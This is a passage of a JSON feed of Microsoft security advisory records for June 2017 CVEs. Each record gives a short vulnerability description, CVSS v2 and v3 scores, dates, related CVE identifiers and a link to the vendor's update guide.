"HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8471", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8471", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8471", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:22", "description": "An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses the vulnerability by correcting how DirectX handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-19T07:00:00", "type": "mscve", "title": "DirectX Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8579", "CVE-2017-8529"], "modified": "2017-06-28T07:00:00", "id": "MS:CVE-2017-8579", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8579", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Microsoft Edge Fetch API incorrectly handles a filtered response type. An attacker could use the vulnerability to read the URL of a cross-origin request. Websites that that do not securely populate the URL with confidential information could allow information to be disclosed to an attacker.\n\nTo exploit the vulnerability, in a web-based attack scenario, an attacker could host a website in an attempt to exploit the vulnerability. In addition, the user must be logged on to a website that does not securely populate URLs with confidential information. However, in all cases an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince the user to take action. For example, an attacker could trick a user into clicking a link that takes them to the attacker's site.\n\nThe update addresses the vulnerability by changing how the Fetch API in Microsoft Edge handles specific filtered response types.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Microsoft Edge Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", "CVE-2017-8504"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8504", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8504", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:22", "description": "A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft browsers and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the related rendering engine. The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nAn attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThe security update addresses the vulnerability by modifying how Microsoft browser JavaScript scripting engines handle objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8517", "CVE-2017-8529"], "modified": "2017-07-11T07:00:00", "id": "MS:CVE-2017-8517", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8517", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:23", "description": "An elevation of privilege vulnerability exists when Windows Hyper-V instruction emulation fails to properly enforce privilege levels. An attacker who successfully exploited this vulnerability could gain elevated privileges on a target guest operating system. The host operating system is not vulnerable to this attack.\n\nThis vulnerability by itself does not allow arbitrary code to be run. However, the vulnerability could be used in conjunction with one or more vulnerabilities (e.g. a remote code execution vulnerability and another elevation of privilege) that could take advantage of the elevated privileges when running.\n\nThe update addresses the vulnerability by correcting how privileges are enforced by Windows Hyper-V instruction emulation.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Hypervisor Code Integrity Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0193", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0193", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0193", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this vulnerability could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.\n\nTo exploit the vulnerability, an attacker would first have to access the local machine, and then inject malicious code into a script that is trusted by the Code Integrity policy. The injected code would then run with the same trust level as the script and bypass the Code Integrity policy.\n\nThe update addresses the vulnerability by correcting how PowerShell exposes functions and processes user supplied code.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0218", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0218", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0218", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8485", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8485", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8485", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when Windows Search handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit the vulnerability, an attacker could send specially crafted SMB messages to the Windows Search service.\n\nThe security update addresses the vulnerabilities by correcting how Windows Search handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Search Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8544", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8544", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8544", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8483", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8483", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8483", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A tampering vulnerability exists in Microsoft Windows that could allow an authenticated attacker to modify the C:\\Users\\DEFAULT folder structure. An attacker who successfully exploited this vulnerability could potentially modify files and folders that are synchronized the first time when a user logs in locally to the computer.\n\nTo exploit this vulnerability, an attacker would need to log on to the affected system and tamper with the DEFAULT folder contents. An attacker can only exploit this vulnerability prior to a user logging on locally to the computer. Users who have logged on before the attacker attempts to exploit this vulnerability would not be affected.\n\nThe security update addresses the vulnerability by correcting permissions on folders inside the DEFAULT folder structure.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Default Folder Tampering Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0295", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0295", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0295", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8481", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8481", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8481", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8480", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8480", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8480", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8479", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8479", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8479", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application.\n\nThe security update addresses the vulnerability by correcting how the Windows kernel initializes memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0300", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0300", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0300", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8476", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8476", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8476", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8474", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8474", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8474", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", 